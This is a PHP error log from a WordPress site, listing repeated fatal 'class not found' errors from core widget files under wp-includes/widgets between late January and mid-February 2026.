[31-Jan-2026 13:59:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[31-Jan-2026 16:36:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[01-Feb-2026 04:56:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[01-Feb-2026 05:42:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[01-Feb-2026 13:30:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[01-Feb-2026 14:05:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[01-Feb-2026 14:08:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[01-Feb-2026 18:57:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[02-Feb-2026 00:07:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[02-Feb-2026 02:04:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[02-Feb-2026 06:13:34 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[02-Feb-2026 13:55:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[02-Feb-2026 14:24:26 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[02-Feb-2026 17:37:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[02-Feb-2026 23:55:08 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[03-Feb-2026 06:15:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[03-Feb-2026 16:12:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[03-Feb-2026 21:15:23 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[03-Feb-2026 23:48:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[04-Feb-2026 02:49:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[04-Feb-2026 02:56:31 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[04-Feb-2026 05:52:30 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[04-Feb-2026 06:08:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[04-Feb-2026 06:32:45 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[04-Feb-2026 11:43:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[04-Feb-2026 13:21:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[04-Feb-2026 14:14:48 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[04-Feb-2026 23:04:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[04-Feb-2026 23:58:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[05-Feb-2026 00:16:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[05-Feb-2026 18:34:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[05-Feb-2026 18:35:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[05-Feb-2026 18:37:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[05-Feb-2026 19:43:19 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[05-Feb-2026 21:04:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[06-Feb-2026 04:14:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[06-Feb-2026 05:49:56 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[06-Feb-2026 05:55:54 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[06-Feb-2026 06:45:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[06-Feb-2026 07:26:04 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[06-Feb-2026 08:19:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[06-Feb-2026 12:53:44 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[06-Feb-2026 12:55:38 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[06-Feb-2026 13:56:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[06-Feb-2026 23:56:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[07-Feb-2026 01:06:47 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[07-Feb-2026 02:58:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[07-Feb-2026 04:16:01 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-text.php on line 17
[07-Feb-2026 04:35:32 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[07-Feb-2026 04:37:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[07-Feb-2026 04:47:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[07-Feb-2026 05:54:35 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[07-Feb-2026 09:38:53 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-categories.php on line 17
[07-Feb-2026 10:46:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[07-Feb-2026 10:47:13 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[07-Feb-2026 15:25:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[07-Feb-2026 17:45:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[08-Feb-2026 11:40:58 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[08-Feb-2026 21:04:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[09-Feb-2026 06:22:20 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[09-Feb-2026 07:48:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[09-Feb-2026 08:52:36 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[09-Feb-2026 09:13:42 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[09-Feb-2026 09:33:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[09-Feb-2026 09:57:50 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[09-Feb-2026 11:51:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[09-Feb-2026 12:01:14 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[09-Feb-2026 14:09:09 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[09-Feb-2026 14:22:59 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[09-Feb-2026 14:36:52 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-video.php on line 18
[09-Feb-2026 17:18:10 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[09-Feb-2026 17:31:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-rss.php on line 17
[09-Feb-2026 17:34:51 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[09-Feb-2026 19:04:37 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-comments.php on line 17
[09-Feb-2026 19:04:39 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-image.php on line 18
[09-Feb-2026 21:36:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-calendar.php on line 17
[09-Feb-2026 22:10:43 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[10-Feb-2026 01:42:55 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-nav-menu-widget.php on line 17
[10-Feb-2026 01:43:06 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[10-Feb-2026 02:21:27 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-recent-posts.php on line 17
[10-Feb-2026 05:06:28 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-custom-html.php on line 17
[10-Feb-2026 06:35:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[10-Feb-2026 06:46:16 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-audio.php on line 18
[10-Feb-2026 07:13:07 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[10-Feb-2026 07:15:33 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget_Media" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php:18
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media-gallery.php on line 18
[10-Feb-2026 09:25:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
[10-Feb-2026 10:46:11 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[10-Feb-2026 12:15:25 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-media.php on line 17
[10-Feb-2026 13:03:12 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[10-Feb-2026 15:20:40 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[10-Feb-2026 15:31:21 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[10-Feb-2026 18:50:00 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-pages.php on line 17
[10-Feb-2026 19:47:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-tag-cloud.php on line 17
[11-Feb-2026 03:04:29 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-search.php on line 17
[11-Feb-2026 05:15:18 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php:19
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-meta.php on line 19
[11-Feb-2026 05:47:05 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-block.php on line 17
[11-Feb-2026 05:55:24 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-links.php on line 17
[11-Feb-2026 07:12:03 UTC] PHP Fatal error:  Uncaught Error: Class "WP_Widget" not found in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php:17
Stack trace:
#0 {main}
  thrown in /home/samtqkvg/public_html/wp-includes/widgets/class-wp-widget-archives.php on line 17
